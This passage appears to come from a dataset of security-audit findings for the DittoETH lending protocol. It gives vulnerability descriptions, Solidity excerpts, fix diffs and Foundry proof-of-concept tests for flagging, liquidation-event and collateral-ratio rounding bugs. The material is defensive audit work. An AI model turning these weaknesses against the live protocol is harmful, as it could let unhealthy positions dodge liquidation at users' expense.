Update the check to `secondLiquidationTime`:\\n```\\ndiff --git a/contracts/libraries/LibShortRecord.sol b/contracts/libraries/LibShortRecord.sol\\nindex 7c5ecc3..c8736b0 100644\\n--- a/contracts/libraries/LibShortRecord.sol\\n+++ b/contracts/libraries/LibShortRecord.sol\\n@@ -391,7 +391,7 @@ library LibShortRecord {\\n                     - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n                     : 0;\\n             //@dev re-use an inactive flaggerId\\n-            if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n+            if (timeDiff > LibAsset.secondLiquidationTime(cusd)) {\\n                 delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n                 short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n             } else if (s.flaggerIdCounter < type(uint16).max) {\\n```\\n
The first flagger will lose the gas spent on flagging and the expected liquidation reward.
```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n
Combining shorts can incorrectly reset the short's flag
medium
The protocol allows users to combine multiple short positions into one as long as the combined short stays above the primary collateral ratio. The function is also able to reset an active flag from any of the combined shorts if the final ratio is above the primaryLiquidationCR.\\nThe issue is that the combineShorts function does not call updateErcDebt, which is called in every other function that is able to reset a short's flag. This means that if the debt is outdated, the final combined short could incorrectly reset the flag, putting the position at a healthy ratio when it really isn't. It would also have to be reflagged and go through the timer again before it can be liquidated.\\nThe combine shorts function merges all short records into the short at position id[0]. Focusing on the debt aspect, it adds up the total debt and calculates the ercDebtSocialized of all positions except for the first.\\n```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n\\nIt then merges this total into the first position using the merge function, which gives us the combined short.\\n```\\n// Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n```\\n\\nFinally, we check if the position had an active flag and, if it did, whether the new combined short is in a healthy enough state to reset the flag; if not, the whole function reverts.\\n```\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n```\\n\\nAs you can see, the updateErcDebt function is not called anywhere in the function, meaning the flag could be reset with outdated values.
Call updateErcDebt on the short once it is combined in the combineShorts function to ensure the collateral ratio is calculated with the most up to date values.\\n```\\n function combineShorts(address asset, uint8[] memory ids)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, ids[0])\\n {\\n // Initial code\\n\\n // Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n\\n firstShort.updateErcDebt(asset); // update debt here before checking flag\\n\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n emit Events.CombineShorts(asset, msg.sender, ids);\\n }\\n```\\n
A short could have its flag incorrectly reset, restarting the liquidation timer. This is not good for the protocol, as it will carry an unhealthy short for a longer time.
```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n
Event in secondaryLiquidation could be misused to show false liquidations
low
The `liquidateSecondary` function in the protocol is designed to emit events detailing the specifics of liquidation, which can be crucial for other protocols or front-end integrations that track secondary liquidations within the protocol. One of the values emitted is `batches`, which indicates which positions got liquidated. However, the function emits the `batches` array as it initially receives it, even though it may skip positions that are not eligible for liquidation during its execution. This implies that the emitted event could contain incorrect data, indicating positions as liquidated even if they were not, due to their ineligibility.\\n```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n
Event in secondaryLiquidation could be misused to show false liquidations\\nModify the `batches` array before emitting it in the event, ensuring it accurately reflects the positions that were actually liquidated.
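A hedged sketch of one way to do that; the eligibility checks are elided, and the in-memory length trim via assembly is one common pattern for emitting a shorter array:\\n```\\nMTypes.BatchMC[] memory liquidated = new MTypes.BatchMC[](batches.length);\\nuint256 count;\\nfor (uint256 i; i < batches.length;) {\\n // ... existing eligibility checks; skipped positions `continue` past this point ...\\n // Record only positions that were actually liquidated\\n liquidated[count++] = batches[i];\\n unchecked { ++i; }\\n}\\n// Shrink the memory array to the number of liquidated entries before emitting\\nassembly { mstore(liquidated, count) }\\nemit Events.LiquidateSecondary(asset, liquidated, msg.sender, isWallet);\\n```\\n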
This inconsistency in the emitted event data can mislead integrators, indicating positions as liquidated even when they were not.
```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n
`Errors.InvalidTwapPrice()` is never invoked when `if (twapPriceInEther == 0)` is true
low
The protocol expects to `revert` with `Errors.InvalidTwapPrice()` when twapPriceInEther == 0:\\n```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n\\nHowever, the control never reaches Line 88 when `twapPriceInEther` is zero. It rather reverts before that with error `Division or modulo by 0`.\\nNOTE: Due to this bug, `Errors.InvalidTwapPrice()` is never invoked/thrown by the protocol even under satisfactory conditions, even though it has been defined.\\nSince I could not find any helper function inside `contracts/` or `test/` which lets one set the `twapPrice` returned by uint256 `twapPrice` = IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes); to zero for testing purposes, I have created a simplified PoC which targets the problem area:\\nSave the following as a file named `test/InvalidTwapPriceErrorCheck.t.sol` and run the test via `forge test --mt testInvalidTwapPriceErrNeverInvoked -vv`. You will find that the test reverts with error `Division or modulo by 0`, but not with `Errors.InvalidTwapPrice()`. The PoC uses the same underlying math libraries and logic path as the protocol does in `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()`.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Constants} from "contracts/libraries/Constants.sol";\\nimport {Errors} from "contracts/libraries/Errors.sol";\\nimport {U256} from "contracts/libraries/PRBMathHelper.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\n\\ncontract InvalidTwapPriceErrorCheck is OBFixture {\\n using U256 for uint256;\\n\\n function getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n // Following code is copied as-is from\\n // `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()#L85-L89`\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n }\\n }\\n\\n function getZeroTwapPriceInEther_CorrectStyle()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n if (twapPriceInEther == 0) { \\n revert Errors.InvalidTwapPrice();\\n }\\n twapPriceInv = twapPriceInEther.inv();\\n }\\n\\n function testInvalidTwapPriceErrNeverInvoked() public pure {\\n getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol();\\n }\\n\\n function testInvalidTwapPriceErrInvokedCorrectly() public {\\n vm.expectRevert(Errors.InvalidTwapPrice.selector);\\n getZeroTwapPriceInEther_CorrectStyle();\\n }\\n}\\n```\\n\\n\\nIn the above test file, you can also run the test which invokes the "fixed" or "correct" code style via `forge test --mt testInvalidTwapPriceErrInvokedCorrectly -vv`. 
This will invoke the `Errors.InvalidTwapPrice` error, as expected.
The check on Line 87 (if condition) needs to be performed immediately after Line 85:\\n```\\n  85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n+ 86 if (twapPriceInEther == 0) {\\n+ 87     revert Errors.InvalidTwapPrice();\\n+ 88 }\\n+ 89 uint256 twapPriceInv = twapPriceInEther.inv();\\n- 86 uint256 twapPriceInv = twapPriceInEther.inv();\\n- 87 if (twapPriceInEther == 0) {\\n- 88     revert Errors.InvalidTwapPrice();\\n- 89 }\\n```\\n\\nThe fix is needed because the `inv()` call reverts before control ever reaches the `if` condition.
A protocol owner or developer monitoring the logs for a revert due to `Errors.InvalidTwapPrice()` will never see it, which will make debugging and issue resolution harder.
```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n
Rounding-up of user's `cRatio` causes loss for the protocol
medium
At multiple places in the code, user's collateral ratio has been calculated in a manner which causes loss of precision (rounding-up) due to division before multiplication. This causes potential loss for the DittoETH protocol, among other problems.\\nRoot Cause\\nUse of the following piece of code causes rounding-up:\\nStyle 1\\n```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n\\nStyle 2\\n```\\nuint256 oraclePrice = LibOracle.getOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getPrice(asset);\\n // rest of code\\n // rest of code\\n // rest of code\\nuint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n```\\n\\n\\nLet's break the issue down into 4 smaller parts:\\nPART 1:\\nLet us first look inside getOraclePrice():\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 20 function getOraclePrice(address asset) internal view returns (uint256) {\\n 21 AppStorage storage s = appStorage();\\n 22 AggregatorV3Interface baseOracle = AggregatorV3Interface(s.baseOracle);\\n 23 uint256 protocolPrice = getPrice(asset);\\n 24 // prettier-ignore\\n 25 (\\n 26 uint80 baseRoundID,\\n 27 int256 basePrice,\\n 28 /*uint256 baseStartedAt*/\\n 29 ,\\n 30 uint256 baseTimeStamp,\\n 31 /*uint80 baseAnsweredInRound*/\\n 32 ) = baseOracle.latestRoundData();\\n 33\\n 34 AggregatorV3Interface oracle = AggregatorV3Interface(s.asset[asset].oracle);\\n 35 if (address(oracle) == address(0)) revert Errors.InvalidAsset();\\n 36\\n 37 if (oracle == baseOracle) {\\n 38 //@dev multiply base oracle by 10**10 to give it 18 decimals of precision\\n 39 uint256 basePriceInEth = basePrice > 0\\n 40 ? uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()\\n 41 : 0;\\n 42 basePriceInEth = baseOracleCircuitBreaker(\\n 43 protocolPrice, baseRoundID, basePrice, baseTimeStamp, basePriceInEth\\n 44 );\\n 45 return basePriceInEth;\\n 46 } else {\\n 47 // prettier-ignore\\n 48 (\\n 49 uint80 roundID,\\n 50 int256 price,\\n 51 /*uint256 startedAt*/\\n 52 ,\\n 53 uint256 timeStamp,\\n 54 /*uint80 answeredInRound*/\\n 55 ) = oracle.latestRoundData();\\n 56 uint256 priceInEth = uint256(price).div(uint256(basePrice));\\n 57 oracleCircuitBreaker(\\n 58 roundID, baseRoundID, price, basePrice, timeStamp, baseTimeStamp\\n 59 );\\n 60 return priceInEth;\\n 61 }\\n 62 }\\n```\\n\\nBased on whether the `oracle` is `baseOracle` or not, the function returns either `basePriceEth` or `priceInEth`.\\n`basePriceEth` can be `uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()` which is basically `1e36 / (basePrice * Constants.BASE_ORACLE_DECIMALS)` or simply written, of the form `oracleN / oracleD` where `oracleN` is the numerator with value 1e36 (as defined here) and `oracleD` is the denominator.\\n`priceInEth` is given as uint256 `priceInEth` = uint256(price).div(uint256(basePrice)) which again is of the form `oracleN / oracleD`.\\n\\nPART 2:\\ngetSavedOrSpotOraclePrice() too internally calls the above `getOraclePrice()` function, if it has been equal to or more than 15 minutes since the last time `LibOrders.getOffsetTime()` was set:\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 153 function getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n 154 if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n 155 return getPrice(asset);\\n 156 } else {\\n 157 return getOraclePrice(asset);\\n 158 }\\n 159 }\\n```\\n\\n\\nPART 
3:\\ngetCollateralRatioSpotPrice() calculates `cRatio` as:\\n```\\n File: contracts/libraries/LibShortRecord.sol\\n\\n 30 function getCollateralRatioSpotPrice(\\n 31 STypes.ShortRecord memory short,\\n 32 uint256 oraclePrice\\n 33 ) internal pure returns (uint256 cRatio) {\\n 34 return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n 35 }\\n```\\n\\n\\nPART 4 (FINAL PART):\\nThere are multiple places in the code (mentioned below under Impacts section) which compare the user's `cRatio` to `initialCR` or `LibAsset.primaryLiquidationCR(_asset)` in the following manner:\\n```\\nif (short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset)) < LibAsset.primaryLiquidationCR(asset))\\n```\\n\\n\\nCalling `short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))` means the value returned from it would be:\\n```\\n // @audit-issue : Potential precision loss. Division before multiplication should not be done.\\n shortCollateral / (shortErcDebt * (oracleN / oracleD)) // return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n```\\n\\nwhich has the potential for precision loss (rounding-up) due to division before multiplication. The correct style ought to be:\\n```\\n// Add the line below\\n (shortCollateral * oracleD) / (shortErcDebt * oracleN)\\n```\\n\\n\\nHave attempted to keep all values in close proximity to the ones present in forked mainnet tests.\\nLet's assume some values for numerator & denominator and other variables:\\n```\\n uint256 private short_collateral = 100361729669569000000; // ~ 100 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // oracleD\\n uint256 private primaryLiquidationCR = 2000000000000000000; // 2 ether (as on forked mainnet)\\n\\n// For this example, we assume that oracle != baseOracle, so that the below calculation would be done by the protocol\\nSo calculated priceInEth = price.div(basePrice) = 501808648347845 // ~ 0.0005 ether\\n```\\n\\n\\nLet's calculate for the scenario of `flagShort()` where the code logic says:\\n```\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true`, then revert, due to rounding-up and the short will incorrectly escape flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n```\\n\\n\\nCreate a file named `test/IncorrectCRatioCheck.t.sol` and paste the following code in it. 
Some mock functions are included here which mirror protocol's calculation style:\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {U256} from "contracts/libraries/PRBMathHelper.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\nimport {console} from "contracts/libraries/console.sol";\\n\\ncontract IncorrectCRatioCheck is OBFixture {\\n using U256 for uint256;\\n\\n uint256 private short_collateral = 85307470219133700000; // ~ 85.3 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // (as on forked mainnet) // oracleD\\n uint256 private primaryLiquidationCR = 1700000000000000000; // 1.7 ether (as on forked mainnet)\\n\\n function _getSavedOrSpotOraclePrice() internal view returns (uint256) {\\n uint256 priceInEth = price.div(basePrice);\\n return priceInEth; // will return 501808648347845 =~ 0.0005 ether // (as on forked mainnet)\\n }\\n\\n function getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n uint256 oraclePrice\\n ) internal view returns (uint256) {\\n return short_collateral.div(short_ercDebt.mul(oraclePrice));\\n }\\n\\n function getCollateralRatioSpotPrice_CorrectStyle(uint256 oracleN, uint256 oracleD)\\n internal\\n view\\n returns (uint256)\\n {\\n return (short_collateral.mul(oracleD)).div(short_ercDebt.mul(oracleN));\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n ) public view {\\n uint256 cRatio =\\n getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n _getSavedOrSpotOraclePrice()\\n );\\n console.log("cRatio calculated (existing style) =", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log("Errors.SufficientCollateral; can not be flagged");\\n } else {\\n console.log("InsufficientCollateral; can be flagged");\\n }\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_CorrectStyle() public view {\\n uint256 cRatio = getCollateralRatioSpotPrice_CorrectStyle(price, basePrice);\\n console.log("cRatio calculated (correct style) =", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log("Errors.SufficientCollateral; can not be flagged");\\n } else {\\n console.log("InsufficientCollateral; can be flagged");\\n }\\n }\\n}\\n```\\n\\n\\nFirst, let's see the output as per protocol's calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol -vv:\\n```\\nLogs:\\n cRatio calculated (existing style) = 1700000000000000996\\n Errors.SufficientCollateral; can not be flagged\\n```\\n\\nSo the short can not be flagged as `cRatio > primaryLiquidationCR` of 1700000000000000000.\\nNow, let's see the output as per the correct calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_CorrectStyle -vv:\\n```\\nLogs:\\n cRatio calculated (correct style) = 1699999999999899995\\n InsufficientCollateral; can be flagged\\n```\\n\\nShort's cRatio is actually below primaryLiquidationCR. Should have been flagged ideally.\\n
These steps need to be taken to fix the issue. The developer may have to make some additional changes, since `.mul`, `.div`, etc. are being used from the `PRBMathHelper.sol` library. Following is the general workflow required:\\nCreate additional functions to fetch oracle parameters instead of price: create copies of `getOraclePrice()` and `getSavedOrSpotOraclePrice()`, but have these return `oracleN` & `oracleD` instead of the calculated price. Let's assume the new names to be `getOraclePriceParams()` and `getSavedOrSpotOraclePriceParams()`.\\nCreate a new function to calculate cRatio which will be used in place of the above occurrences of getCollateralRatioSpotPrice():\\n```\\n function getCollateralRatioSpotPriceFromOracleParams(\\n STypes.ShortRecord memory short,\\n uint256 oracleN,\\n uint256 oracleD\\n ) internal pure returns (uint256 cRatio) {\\n return (short.collateral.mul(oracleD)).div(short.ercDebt.mul(oracleN));\\n }\\n```\\n\\n\\nFor fixing the last issue of `oraclePrice.mul(1.01 ether)` on L847, first call `getOraclePriceParams()` to get `oracleN` & `oracleD` and then:\\n```\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n-847     <= oraclePrice.mul(1.01 ether)\\n+847     <= (oracleN.mul(1.01 ether)).div(oracleD)\\n 848     && s.shorts[asset][prevId].price >= oraclePrice;\\n```\\n
```\\n File: contracts/facets/YieldFacet.sol\\n\\n 76 function _distributeYield(address asset)\\n 77 private\\n 78 onlyValidAsset(asset)\\n 79 returns (uint88 yield, uint256 dittoYieldShares)\\n 80 {\\n 81 uint256 vault = s.asset[asset].vault;\\n 82 // Last updated zethYieldRate for this vault\\n 83 uint80 zethYieldRate = s.vault[vault].zethYieldRate;\\n 84 // Protocol time\\n 85 uint256 timestamp = LibOrders.getOffsetTimeHours();\\n 86 // Last saved oracle price\\n 87 uint256 oraclePrice = LibOracle.getPrice(asset);\\n 88 // CR of shortRecord collateralized at initialMargin for this asset\\n 89 uint256 initialCR = LibAsset.initialMargin(asset) + 1 ether;\\n 90 // Retrieve first non-HEAD short\\n 91 uint8 id = s.shortRecords[asset][msg.sender][Constants.HEAD].nextId;\\n 92 // Loop through all shorter's shorts of this asset\\n 93 while (true) {\\n 94 // One short of one shorter in this market\\n 95 STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n 96 // To prevent flash loans or loans where they want to deposit to claim yield immediately\\n 97 bool isNotRecentlyModified =\\n 98 timestamp - short.updatedAt > Constants.YIELD_DELAY_HOURS;\\n 99 // Check for cancelled short\\n 100 if (short.status != SR.Cancelled && isNotRecentlyModified) {\\n 101 uint88 shortYield =\\n 102 short.collateral.mulU88(zethYieldRate - short.zethYieldRate);\\n 103 // Yield earned by this short\\n 104 yield += shortYield;\\n 105 // Update zethYieldRate for this short\\n 106 short.zethYieldRate = zethYieldRate;\\n 107 // Calculate CR to modify ditto rewards\\n 108 uint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n 109 if (cRatio <= initialCR) {\\n 110 dittoYieldShares += shortYield;\\n 111 } else {\\n 112 // Reduce amount of yield credited for ditto rewards proportional to CR\\n 113 dittoYieldShares += shortYield.mul(initialCR).div(cRatio);\\n 114 }\\n 115 }\\n 116 // Move to next short unless this is the last one\\n 117 if (short.nextId > Constants.HEAD) {\\n 118 id = short.nextId;\\n 119 } else {\\n 120 break;\\n 121 }\\n 122 }\\n 123 }\\n```\\n\\nThis rounding-up can lead to a user's `cRatio` being considered `> initialCR` even when it is slightly lower. 
This results in greater `dittoYieldShares` being calculated.\\n```\\n File: contracts/facets/MarginCallPrimaryFacet.sol\\n\\n 43 function flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n 44 external\\n 45 isNotFrozen(asset)\\n 46 nonReentrant\\n 47 onlyValidShortRecord(asset, shorter, id)\\n 48 {\\n 49 if (msg.sender == shorter) revert Errors.CannotFlagSelf();\\n 50 STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n 51 short.updateErcDebt(asset);\\n 52\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true` due to rounding-up and the short will not be eligible for flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n 59\\n 60 uint256 adjustedTimestamp = LibOrders.getOffsetTimeHours();\\n 61\\n 62 // check if already flagged\\n 63 if (short.flaggerId != 0) {\\n 64 uint256 timeDiff = adjustedTimestamp - short.updatedAt;\\n 65 uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(asset);\\n 66\\n 67 if (timeDiff <= resetLiquidationTime) {\\n 68 revert Errors.MarginCallAlreadyFlagged();\\n 69 }\\n 70 }\\n 71\\n 72 short.setFlagger(cusd, flaggerHint);\\n 73 emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n 74 }\\n```\\n\\n\\n```\\n File: contracts/facets/MarginCallSecondaryFacet.sol\\n\\n 38 function liquidateSecondary(\\n 39 address asset,\\n 40 MTypes.BatchMC[] memory batches,\\n 41 uint88 liquidateAmount,\\n 42 bool isWallet\\n 43 ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n 44 STypes.AssetUser storage AssetUser = s.assetUser[asset][msg.sender];\\n 45 MTypes.MarginCallSecondary memory m;\\n 46 uint256 minimumCR = LibAsset.minimumCR(asset);\\n 47 uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset);\\n 48 uint256 secondaryLiquidationCR = LibAsset.secondaryLiquidationCR(asset);\\n 49\\n 50 uint88 liquidatorCollateral;\\n 51 uint88 liquidateAmountLeft = liquidateAmount;\\n 52 for (uint256 i; i < batches.length;) {\\n 53 m = _setMarginCallStruct(\\n 54 asset, batches[i].shorter, batches[i].shortId, minimumCR, oraclePrice\\n 55 );\\n 56\\n\\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n\\n 129 function _setMarginCallStruct(\\n 130 address asset,\\n 131 address shorter,\\n 132 uint8 id,\\n 133 uint256 minimumCR,\\n 134 uint256 oraclePrice\\n 135 ) private returns (MTypes.MarginCallSecondary memory) {\\n 136 LibShortRecord.updateErcDebt(asset, shorter, id);\\n 137\\n 138 MTypes.MarginCallSecondary memory m;\\n 139 m.asset = asset;\\n 140 m.short = s.shortRecords[asset][shorter][id];\\n 141 m.vault = s.asset[asset].vault;\\n 142 m.shorter = shorter;\\n 143 m.minimumCR = minimumCR;\\n 144 m.cRatio = m.short.getCollateralRatioSpotPrice(oraclePrice);\\n 145 return m;\\n 146 }\\n```\\n\\n\\n```\\n File: contracts/facets/ShortRecordFacet.sol\\n\\n 117 function combineShorts(address asset, uint8[] memory ids)\\n 118 external\\n 119 isNotFrozen(asset)\\n 120 nonReentrant\\n 121 onlyValidShortRecord(asset, msg.sender, ids[0])\\n 122 {\\n 123 if (ids.length < 2) revert Errors.InsufficientNumberOfShorts();\\n 124 // First short in the array\\n 125 STypes.ShortRecord storage firstShort = s.shortRecords[asset][msg.sender][ids[0]];\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 174\\n 175 // Merge all short records into 
the short at position id[0]\\n 176 firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n 177\\n 178 // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n 179 if (c.shortFlagExists) {\\n 180 if (\\n 181 firstShort.getCollateralRatioSpotPrice(\\n 182 LibOracle.getSavedOrSpotOraclePrice(_asset)\\n 183 ) < LibAsset.primaryLiquidationCR(_asset)\\n 184 ) revert Errors.InsufficientCollateral();\\n 185 // Resulting combined short has sufficient c-ratio to remove flag\\n 186 firstShort.resetFlag();\\n 187 }\\n 188 emit Events.CombineShorts(asset, msg.sender, ids);\\n 189 }\\n```\\n\\n\\nNOTE:\\nWhile the operation done in this piece of code is a bit different from the above analysis, I am clubbing it with this bug report as the underlying issue is the same (and the resolution would be similar): multiplication and division operations should not be done directly on top of the fetched oracle price without paying attention to the order of evaluation:\\n```\\n File: contracts/libraries/LibOrders.sol\\n\\n 812 function _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n 813 private\\n 814 {\\n 815 AppStorage storage s = appStorage();\\n 816 uint256 oraclePrice = LibOracle.getOraclePrice(asset);\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n 847 <= oraclePrice.mul(1.01 ether) // @audit-issue : division before multiplication\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 866 }\\n```\\n\\n\\nThe effective calculation being done above is:\\n```\\n (oracleN / oracleD) * (1.01 ether) // division before multiplication\\n```\\n\\n\\nWhich should have been:\\n```\\n (oracleN * 1.01 ether) / oracleD\\n```\\n\\n\\nSimilar multiplication or division operations have been done on `price` at various places throughout the code, which can be clubbed under this root cause itself.
```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n
Primary short liquidation can not be completed in the last hour of the liquidation timeline
medium
